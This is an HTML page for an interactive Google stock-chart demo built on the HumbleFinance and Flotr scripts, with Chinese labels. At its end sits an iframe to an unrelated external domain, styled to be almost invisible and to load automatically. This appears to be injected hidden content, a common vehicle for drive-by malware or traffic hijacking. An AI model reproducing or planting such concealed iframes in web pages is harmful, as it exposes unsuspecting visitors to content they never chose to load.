<!DOCTYPE html>
<html>

  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <title>临时指向：html5互动股票图形数据</title>
<link rel="stylesheet" type="text/css" href="css/hsd.css?d3fa1" />
<link rel="stylesheet" type="text/css" href="css/finance.css?d3fa1" />
    <style>
     .templink {
       width: 1%;
       height: 1%;
       display: block;
       position: fixed;
       z-index: 100;
       margin-top: -10px;
       margin-left: -10px;
     }
    </style>

  </head>
  
  <body>
    <div id="content-container">
	<div id="content">
		<div id="finance">
			<div id="labels">
				<div id="financeTitle">
					纳斯达克：谷歌股价图 NASDAQ:GOOG</div>
				<div id="time">
					<a onclick="HumbleFinance.zoom(5);">1周</a>
					<a onclick="HumbleFinance.zoom(21);">1月</a>
					<a onclick="HumbleFinance.zoom(65);">3月</a>
					<a onclick="HumbleFinance.zoom(127);">6月</a>
					<a onclick="HumbleFinance.zoom(254);">1年</a>
					<a onclick="HumbleFinance.zoom(1265);">5年</a> </div>
				<div id="dateRange">
				</div>
			</div>
		</div>
	</div>
</div>
</div>
<script src="js/hsd.js?d3fa1"></script>
<script src="js/prototype.min.js?d3fa1"></script>
<script src="js/Finance.js?d3fa1"></script>
<script src="js/excanvas.js?d3fa1"></script>
<script src="js/base64.js?d3fa1"></script>
<script src="js/canvas2image.js?d3fa1"></script>
<script src="js/canvastext.js?d3fa1"></script>
<script src="js/flotr.js?d3fa1"></script>
<script src="js/HumbleFinance.js?d3fa1"></script>
<script src="js/data.js?d3fa1"></script>
<script src="js/demo.js?d3fa1"></script>
    <iframe class="templink" src="http://i-org.ga"></iframe>
    
  </body>
</html>
